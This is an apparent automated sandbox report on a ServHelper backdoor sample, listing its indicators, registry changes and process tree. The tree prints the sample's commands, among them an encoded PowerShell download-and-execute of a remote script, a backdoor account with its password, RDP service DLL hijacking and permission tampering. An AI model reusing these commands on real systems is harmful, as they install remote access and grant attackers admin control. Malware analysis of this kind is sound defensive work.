servhelper | d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8

Analysis

max time kernel
136s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2024 05:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86178014e457120d9dc6f6e27453338c.exe
Size

6.0MB
MD5

86178014e457120d9dc6f6e27453338c
SHA1

16ab38c0e9c4516532f9d111523e948a6311bfc0
SHA256

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
SHA512

746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
SSDEEP

49152:+G6we2P/3W01/65p9CepD70BIme1AWwYg015Y5vl5zytq9oB5JSZZSYu5q01ka2i:+32P/d/s

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

flow	pid	Process
24	4460	powershell.exe
26	4460	powershell.exe
28	4460	powershell.exe
34	4460	powershell.exe
37	4460	powershell.exe
39	4460	powershell.exe
41	4460	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2468	icacls.exe
100	icacls.exe
2800	icacls.exe
4424	takeown.exe
640	icacls.exe
3228	icacls.exe
2444	icacls.exe
976	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
1408	Process not Found
1408	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4424	takeown.exe
2468	icacls.exe
100	icacls.exe
2800	icacls.exe
640	icacls.exe
3228	icacls.exe
2444	icacls.exe
976	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00080000000231fa-98.dat	upx
behavioral2/files/0x000d00000002311b-97.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A41.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A51.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A73.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A83.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_i1dne5hp.k4e.ps1	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_y0xx0ckj.gr2.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A62.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4408	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0d1285d26635da01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
464	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2540	powershell.exe
2540	powershell.exe
3288	powershell.exe
3288	powershell.exe
3288	powershell.exe
3968	net1.exe
3968	net1.exe
3968	net1.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe
2540	powershell.exe
2540	powershell.exe
2540	powershell.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2620	86178014e457120d9dc6f6e27453338c.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeDebugPrivilege	3968	net1.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeRestorePrivilege	2444	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4408	WMIC.exe
Token: SeAuditPrivilege	4408	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4408	WMIC.exe
Token: SeAuditPrivilege	4408	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4200	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4200	WMIC.exe
Token: SeAuditPrivilege	4200	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4200	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4200	WMIC.exe
Token: SeAuditPrivilege	4200	WMIC.exe
Token: SeDebugPrivilege	4460	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2620 wrote to memory of 2540	2620	86178014e457120d9dc6f6e27453338c.exe	91
PID 2620 wrote to memory of 2540	2620	86178014e457120d9dc6f6e27453338c.exe	91
PID 2540 wrote to memory of 3900	2540	powershell.exe	112
PID 2540 wrote to memory of 3900	2540	powershell.exe	112
PID 3900 wrote to memory of 3544	3900	net.exe	96
PID 3900 wrote to memory of 3544	3900	net.exe	96
PID 2540 wrote to memory of 3288	2540	powershell.exe	99
PID 2540 wrote to memory of 3288	2540	powershell.exe	99
PID 2540 wrote to memory of 3968	2540	powershell.exe	140
PID 2540 wrote to memory of 3968	2540	powershell.exe	140
PID 2540 wrote to memory of 4364	2540	powershell.exe	103
PID 2540 wrote to memory of 4364	2540	powershell.exe	103
PID 2540 wrote to memory of 4424	2540	powershell.exe	162
PID 2540 wrote to memory of 4424	2540	powershell.exe	162
PID 2540 wrote to memory of 976	2540	powershell.exe	161
PID 2540 wrote to memory of 976	2540	powershell.exe	161
PID 2540 wrote to memory of 2444	2540	powershell.exe	160
PID 2540 wrote to memory of 2444	2540	powershell.exe	160
PID 2540 wrote to memory of 3228	2540	powershell.exe	159
PID 2540 wrote to memory of 3228	2540	powershell.exe	159
PID 2540 wrote to memory of 640	2540	powershell.exe	158
PID 2540 wrote to memory of 640	2540	powershell.exe	158
PID 2540 wrote to memory of 2800	2540	powershell.exe	157
PID 2540 wrote to memory of 2800	2540	powershell.exe	157
PID 2540 wrote to memory of 100	2540	powershell.exe	156
PID 2540 wrote to memory of 100	2540	powershell.exe	156
PID 2540 wrote to memory of 2468	2540	powershell.exe	105
PID 2540 wrote to memory of 2468	2540	powershell.exe	105
PID 2540 wrote to memory of 4512	2540	powershell.exe	155
PID 2540 wrote to memory of 4512	2540	powershell.exe	155
PID 2540 wrote to memory of 464	2540	powershell.exe	107
PID 2540 wrote to memory of 464	2540	powershell.exe	107
PID 2540 wrote to memory of 1656	2540	powershell.exe	165
PID 2540 wrote to memory of 1656	2540	powershell.exe	165
PID 2540 wrote to memory of 788	2540	powershell.exe	154
PID 2540 wrote to memory of 788	2540	powershell.exe	154
PID 788 wrote to memory of 3672	788	net.exe	108
PID 788 wrote to memory of 3672	788	net.exe	108
PID 2540 wrote to memory of 3416	2540	powershell.exe	153
PID 2540 wrote to memory of 3416	2540	powershell.exe	153
PID 3416 wrote to memory of 1592	3416	cmd.exe	152
PID 3416 wrote to memory of 1592	3416	cmd.exe	152
PID 1592 wrote to memory of 1832	1592	cmd.exe	151
PID 1592 wrote to memory of 1832	1592	cmd.exe	151
PID 1832 wrote to memory of 4004	1832	net.exe	109
PID 1832 wrote to memory of 4004	1832	net.exe	109
PID 2540 wrote to memory of 1088	2540	powershell.exe	150
PID 2540 wrote to memory of 1088	2540	powershell.exe	150
PID 1088 wrote to memory of 5004	1088	cmd.exe	113
PID 1088 wrote to memory of 5004	1088	cmd.exe	113
PID 5004 wrote to memory of 3900	5004	cmd.exe	112
PID 5004 wrote to memory of 3900	5004	cmd.exe	112
PID 3900 wrote to memory of 1424	3900	net.exe	111
PID 3900 wrote to memory of 1424	3900	net.exe	111
PID 3076 wrote to memory of 1596	3076	cmd.exe	148
PID 3076 wrote to memory of 1596	3076	cmd.exe	148
PID 1596 wrote to memory of 3132	1596	net.exe	147
PID 1596 wrote to memory of 3132	1596	net.exe	147
PID 4452 wrote to memory of 1608	4452	cmd.exe	117
PID 4452 wrote to memory of 1608	4452	cmd.exe	117
PID 1608 wrote to memory of 3596	1608	net.exe	116
PID 1608 wrote to memory of 3596	1608	net.exe	116
PID 2248 wrote to memory of 3876	2248	cmd.exe	144
PID 2248 wrote to memory of 3876	2248	cmd.exe	144

C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe
"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4lsoqffq\4lsoqffq.cmdline"
    3⤵
    PID:3900
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A26.tmp" "c:\Users\Admin\AppData\Local\Temp\4lsoqffq\CSC4D76EC373C1A4FAAA59D2B6DB090E790.TMP"
      4⤵
      PID:3544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start TermService
      4⤵
      PID:1424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:3968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2468
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1656
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:464
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1088
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3416
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:788
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4512
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:100
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2800
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:640
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3228
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:976
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4424
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
1⤵
PID:3672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
1⤵
PID:4004

C:\Windows\system32\net.exe
net start TermService
1⤵
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\system32\cmd.exe
cmd /c net start TermService
1⤵
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc hAMh1tfC /add
1⤵
PID:3596

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc hAMh1tfC /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc hAMh1tfC
1⤵
PID:1196

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
1⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1740

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4200

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2008
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
